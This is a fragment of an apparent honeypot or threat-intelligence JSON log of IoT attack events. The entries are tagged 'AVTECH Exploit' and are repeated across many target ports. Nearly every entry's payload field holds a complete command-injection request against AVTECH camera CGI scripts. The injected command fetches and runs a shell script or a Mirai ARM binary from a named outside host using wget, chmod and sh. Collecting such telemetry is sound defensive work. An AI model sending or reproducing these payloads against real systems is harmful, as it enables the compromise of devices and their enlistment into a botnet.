- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:06:47Z",
- "last_seen": "2020-06-01T05:06:47Z"
- },
- {
- "event_id": "d5a7a16a1d90182ca8dce5744a9fcec6fb5bfce264311f35d92323effead58c6",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 10443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:06:39Z",
- "last_seen": "2020-06-01T05:06:39Z"
- },
- {
- "event_id": "26ef2df73d13017fdc9b06f2067687f6a668b8b9b2bbda38ab631cb89e3b3f11",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7474,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:02:56Z",
- "last_seen": "2020-06-01T05:06:35Z"
- },
- {
- "event_id": "6b94a1154e0c4331052239163aad75328bf038cdef01bbeedb1d79a93d338d57",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7474,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:02:47Z",
- "last_seen": "2020-06-01T05:06:28Z"
- },
- {
- "event_id": "615dcb886c99158a26133e93204173715ea08978f0e1d8fb307722d95375603e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 6511,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:02:56Z",
- "last_seen": "2020-06-01T05:03:53Z"
- },
- {
- "event_id": "f6496744695ad827d59b1c2c419f7c028ee5cee13c94a2cd2c6e46865c05dbd7",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 6511,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:02:47Z",
- "last_seen": "2020-06-01T05:03:46Z"
- },
- {
- "event_id": "20ef211dfbbec46788636c345cd8a6fbb93f39f811b961881022de3005f02af0",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:57:23Z",
- "last_seen": "2020-06-01T04:57:23Z"
- },
- {
- "event_id": "4e5e0d5b06f29b9f55921c1b96015767411498e732f3590e9878c1dc7ce1a7cd",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:57:14Z",
- "last_seen": "2020-06-01T04:57:14Z"
- },
- {
- "event_id": "ba2a8de3d4ffe6f8406b0f656b7395f1b3c1884af46e3853e69d51ab881d0717",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:55:17Z",
- "last_seen": "2020-06-01T04:55:17Z"
- },
- {
- "event_id": "3a092d57233029d93ae41375a6418949f2af10ce50591e3cf14fec67d21d1b45",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 16993,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:55:09Z",
- "last_seen": "2020-06-01T04:55:09Z"
- },
- {
- "event_id": "0089f2e08919f304a84cb8868762eaacd5436096d299671f78ebd19a9da59cf2",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 10443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:55:02Z",
- "last_seen": "2020-06-01T04:55:02Z"
- },
- {
- "event_id": "e5db591f234a90c37b65a8dffe3082357a8592ccd5506d9fc5ca285cb080313d",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:54:55Z",
- "last_seen": "2020-06-01T04:54:55Z"
- },
- {
- "event_id": "14bf2a7882c4d40be94795792f6c62d3c9801fdc54c730dc4df6b6f0f395490d",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:54:24Z",
- "last_seen": "2020-06-01T04:54:24Z"
- },
- {
- "event_id": "4997fe885e3ec2dca79a04089412a0b96d435a8976c1d113d112e3adcb846cd3",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:54:16Z",
- "last_seen": "2020-06-01T04:54:16Z"
- },
- {
- "event_id": "5bd3d265eae36b6c7d3b81d0bc7e38cb0558f4a42b9cf5c3576283bdf8467df8",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T04:45:36Z",
- "last_seen": "2020-06-01T04:49:53Z"
- },
- {
- "event_id": "7f3d4dd658b13ed7fbda959b3fd61b09d20d7b02b47d384958f8a46fe3a3a365",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8082,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:49:46Z",
- "last_seen": "2020-06-01T04:49:46Z"
- },
- {
- "event_id": "96b27c9817d2aa059a4974fbf9e7df9ab2ef0afe6ae6eee3f09fa849ca2b9054",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8081,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:48:54Z",
- "last_seen": "2020-06-01T04:48:54Z"
- },
- {
- "event_id": "f5e3094f0d2511f38bdf5282f389b344d52f1a7f5b14d635d7deed695b0612fa",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 50000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:48:33Z",
- "last_seen": "2020-06-01T04:48:33Z"
- },
- {
- "event_id": "6365b203e30ca8215d3e6a63c038a472e9ed621873a9aed30524aaa4fbe69ba5",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:48:29Z",
- "last_seen": "2020-06-01T04:48:29Z"
- },
- {
- "event_id": "4db7de3421c9914fcb39362c4dbf29c249760baed4ee315048d78c9939e821c8",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8181,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:48:23Z",
- "last_seen": "2020-06-01T04:48:23Z"
- },
- {
- "event_id": "a94fc31fed6a00d1527de1a5679e848ad820213ad23921876e92069aee5ab133",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2083,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:47:54Z",
- "last_seen": "2020-06-01T04:47:54Z"
- },
- {
- "event_id": "53dd23f7f36d7f0a690ced7af968eedc351e050cb42a6f2b16182abc5118dc5d",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 3389,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:47:28Z",
- "last_seen": "2020-06-01T04:47:28Z"
- },
- {
- "event_id": "43e2a90630378dcab1d89dd1099a0017086b729053a3dc6088f35139673cbc7c",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8089,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:46:42Z",
- "last_seen": "2020-06-01T04:46:42Z"
- },
- {
- "event_id": "267c6bdc212f002fa5c33597c7d36fee9ffda6e313e526146867c1d76a1e7a57",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 52869,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:46:29Z",
- "last_seen": "2020-06-01T04:46:29Z"
- },
- {
- "event_id": "c9fee0169b72bff0a44029130581230bfbfc308091f02ad1af0412c73ecf0b9f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:46:26Z",
- "last_seen": "2020-06-01T04:46:26Z"
- },
- {
- "event_id": "eb9278bf1072775efd7d9924c7c563250cbee2a7b1ca3c050202d674502888c4",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2375,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:46:17Z",
- "last_seen": "2020-06-01T04:46:17Z"
- },
- {
- "event_id": "23b7bc731b876a0c87000bd4ef70c9e9e63eb15b54c9047da93d9638bd82fb1e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8008,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:46:06Z",
- "last_seen": "2020-06-01T04:46:06Z"
- },
- {
- "event_id": "336f2b9b9b86e508f11fffc78d70193f76a45cd0a43bbdf4a6122081cab18f62",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:45:45Z",
- "last_seen": "2020-06-01T04:45:45Z"
- },
- {
- "event_id": "f2103f0d9e562a99204891158486281d1533118e479c8bc5cb9b12dfd94db500",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:45:44Z",
- "last_seen": "2020-06-01T04:45:44Z"
- },
- {
- "event_id": "fc4f47bd80535f88aa481a4948641d34e01ac17dad04f6c39c3f65b2f65466fc",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 21.8UsA.sh; chmod 777 21.8UsA.sh; sh 21.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:45:38Z",
- "last_seen": "2020-06-01T04:45:38Z"
- },
- {
- "event_id": "81b902f1d292921f4bddee716132e9dc1b934e495e45868ba54e424f1951f647",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8008,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T04:33:22Z",
- "last_seen": "2020-06-01T04:43:48Z"
- },
- {
- "event_id": "84341cf107ca5f661489d66a09eae88ed0cdee84746ac8994b6c02d104f94a37",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 4567,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:43:44Z",
- "last_seen": "2020-06-01T04:43:44Z"
- },
- {
- "event_id": "54e39f4a853ae442af233e14623d00fd23d94e5ce0cc805825e49ae0625942bc",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T04:34:54Z",
- "last_seen": "2020-06-01T04:43:36Z"
- },
- {
- "event_id": "b5cad8068a0bacab36c0340da886d0c2d4330de1d6f54b9b0e8367557d04e46b",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 16992,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T04:34:06Z",
- "last_seen": "2020-06-01T04:42:41Z"
- },
- {
- "event_id": "66bf218ce87b8f49d255d041f0a7294c86a4e02215d7d9a4938a28da87d8a9ff",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9090,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:42:19Z",
- "last_seen": "2020-06-01T04:42:19Z"
- },
- {
- "event_id": "019a678a5f2548b375e04d61a44f372469ffa752ac81e1faa79a044efc9d7387",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:42:17Z",
- "last_seen": "2020-06-01T04:42:17Z"
- },
- {
- "event_id": "dae728760ee9754fa1b36818f53d921a42ba4c1a9fc07fd3230fa2be68f158f2",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9100,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:42:17Z",
- "last_seen": "2020-06-01T04:42:17Z"
- },
- {
- "event_id": "1961dbc575e9ddd1b6f4ae05551f06d3f3ab59f4920ea34182acfcc62861ae42",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm5 -O 7.mirai.arm5; chmod 777 7.mirai.arm5; ./7.mirai.arm5 avtech)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
